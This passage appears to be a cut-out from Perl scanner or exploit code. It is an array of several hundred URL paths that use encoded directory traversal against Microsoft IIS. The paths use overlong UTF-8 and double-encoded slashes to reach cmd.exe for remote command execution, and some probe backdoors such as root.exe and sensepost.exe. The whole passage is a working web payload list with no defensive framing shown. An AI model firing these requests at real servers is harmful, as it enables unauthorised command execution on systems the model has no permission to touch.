"/MSADC/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[53] = "/MSADC/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[54] = "/MSADC/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[55] = "/MSADC/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[56] = "/MSADC/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[57] = "/MSADC/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[58] = "/MSADC/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[59] = "/MSADC/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[60] = "/MSADC/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[61] = "/MSADC/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[62] = "/MSADC/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[63] = "/MSADC/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[64] = "/MSADC/root.exe?/c+"; $U[65] = "/MSADC/cmd.exe?/c+"; $U[66] = "/MSADC/sensepost.exe?/c+"; $U[67] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[68] = "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[69] = "/MSADC/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[70] = "/MSADC/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[71] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[72] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[73] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[74] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[75] = "/msadc..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[76] = "/msadc/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[77] = "/msadc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[78] = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[79] = "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[80] = "/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[81] = "/msadc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[82] = "/msadc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[83] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[84] = "/msadc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[85] = "/msadc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[86] = "/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[87] = "/msadc/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[88] = "/msadc/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[89] = "/msadc/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[90] = "/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[91] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[92] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[93] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[94] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[95] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[96] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[97] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[98] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[99] = "/msadc/root.exe?/c+"; $U[100] = "/msadc/cmd.exe?/c+"; $U[101] = "/msadc/sensepost.exe?/c+"; $U[102] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[103] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[104] = "/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[105] = "/msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[106] = "/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[107] = "/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[108] = "/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[109] = "/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[110] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[111] = "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[112] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[113] = "/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[114] = "/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[115] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[116] = "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[117] = "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[118] = "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[119] = "/scripts/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[120] = "/scripts/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[121] = "/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[122] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[123] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[124] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[125] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[126] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[127] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[128] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[129] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[130] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[131] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[132] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[133] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[134] = "/scripts/root.exe?/c+"; $U[135] = "/scripts/cmd.exe?/c+"; $U[136] = "/scripts/sensepost.exe?/c+"; $U[137] = "/scripts/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[138] = "/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[139] = "/scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[140] = "/scripts/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[141] = "/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[142] = "/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[143] = "/PBServer/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[144] = "/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[145] = "/PBServer..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[146] = "/PBServer/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[147] = "/PBServer/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[148] = "/PBServer/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[149] = "/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[150] = "/PBServer/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[151] = "/PBServer/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[152] = "/PBServer/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[153] = "/PBServer/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[154] = "/PBServer/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[155] = "/PBServer/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[156] = "/PBServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[157] = "/PBServer/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[158] = "/PBServer/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[159] = "/PBServer/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[160] = "/PBServer/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[161] = "/PBServer/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[162] = "/PBServer/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[163] = "/PBServer/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[164] = "/PBServer/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[165] = "/PBServer/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[166] = "/PBServer/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[167] = "/PBServer/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[168] = "/PBServer/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[169] = "/PBServer/root.exe?/c+"; $U[170] = "/PBServer/cmd.exe?/c+"; $U[171] = "/PBServer/sensepost.exe?/c+"; $U[172] = "/PBServer/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[173] = "/PBServer/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[174] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[175] = "/PBServer/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[176] = "/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[177] = "/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[178] = "/Rpc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[179] = "/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[180] = "/Rpc..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[181] = "/Rpc/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[182] = "/Rpc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[183] = "/Rpc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[184] = "/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[185] = "/Rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[186] = "/Rpc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[187] = "/Rpc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[188] = "/Rpc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[189] = "/Rpc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[190] = "/Rpc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[191] = "/Rpc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[192] = "/Rpc/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[193] = "/Rpc/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[194] = "/Rpc/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[195] = "/Rpc/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[196] = "/Rpc/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[197] = "/Rpc/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[198] = "/Rpc/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[199] = "/Rpc/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[200] = "/Rpc/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[201] = "/Rpc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[202] = "/Rpc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[203] = "/Rpc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[204] = "/Rpc/root.exe?/c+"; $U[205] = "/Rpc/cmd.exe?/c+"; $U[206] = "/Rpc/sensepost.exe?/c+"; $U[207] = "/Rpc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[208] = "/Rpc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[209] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[210] = "/Rpc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[211] = "/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[212] = "/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[213] = "/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[214] = "/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[215] = "/samples..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[216] = "/samples/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[217] = "/samples/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[218] = "/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[219] = "/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[220] = "/samples/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[221] = "/samples/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[222] = "/samples/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[223] = "/samples/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[224] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[225] = "/samples/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[226] = "/samples/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[227] = "/samples/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[228] = "/samples/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[229] = "/samples/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[230] = "/samples/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[231] = "/samples/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[232] = "/samples/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[233] = "/samples/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[234] = "/samples/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[235] = "/samples/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[236] = "/samples/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[237] = "/samples/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[238] = "/samples/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[239] = "/samples/root.exe?/c+"; $U[240] = "/samples/cmd.exe?/c+"; $U[241] = "/samples/sensepost.exe?/c+"; $U[242] = "/samples/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[243] = "/samples/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[244] = "/samples/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[245] = "/samples/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[246] = "/_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[247] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $U[248] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[249] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[250] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[251] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $U[252] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[253] = "/_vti_bin/..%c0%af../..%c0%1f../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[254] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[255] = "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[256] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[257] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[258] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[259] = "/cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[260] = "/cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[261] = "/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[262] = "/cgi-bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[263] = "/cgi-bin..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[264] = "/cgi-bin/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[265] = "/cgi-bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[266] = "/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[267] = "/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[268] = "/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[269] = "/cgi-bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[270] = "/cgi-bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[271] = "/cgi-bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[272] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[273] = "/cgi-bin/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[274] = "/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[275] = "/cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[276] = "/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[277] = "/cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[278] = "/cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[279] = "/cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[280] = "/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[281] = "/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[282] = "/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[283] = "/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[284] = "/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[285] = "/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[286] = "/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[287] = "/cgi-bin/root.exe?/c+"; $U[288] = "/cgi-bin/cmd.exe?/c+"; $U[289] = "/cgi-bin/sensepost.exe?/c+"; $U[290] = "/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[291] = "/cgi-bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[292] = "/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[293] = "/cgi-bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[294] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[295] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[296] = "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[297] = "/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[298] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[299] = "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[300] = "/includes/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[301] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[302] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[303] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[304] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[305] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[306] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[307] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[308] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[309] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[310] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[311] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[312] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[313] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[314] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[315] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $U[316] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[317] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[318] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[319] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[320] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[321] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[322] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[323] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[324] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt./system32/cmd.exe?/c+"; $U[325] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[326] = "/msadc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[327] = "/msadc/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[328] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[329] = "/msadc/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[330] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[331] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[332] = "/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[333] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[334] = "/msadc/..%c1%9c/winnt/system32/cmd.exe?/c+"; $U[335] = "/msadc/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+"; $U[336] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[337] = "/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[338] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[339] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[340] = "/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[341] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[342] = "/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[343] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[344] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[345] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[346] = "/msadc/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+"; $U[347] = "/msadc/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+"; $U[348] = "/msadc/..%u002e..%u002e/winnt/system32/cmd.exe?/c+"; $U[349] = "/msadc/..%u002f..%u002fwinnt/system32/cmd.exe?/c+"; $U[350] = "/msadc/..%u005c..%u005cwinnt/system32/cmd.exe?/c+"; $U[351] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $U[352] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[353] = "/_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[354] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[355] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[356] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?./c+"; $U[357] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[358] = "/_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[359] = "/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[360] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[361] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[362] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[363] = "/_mem_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[364] = 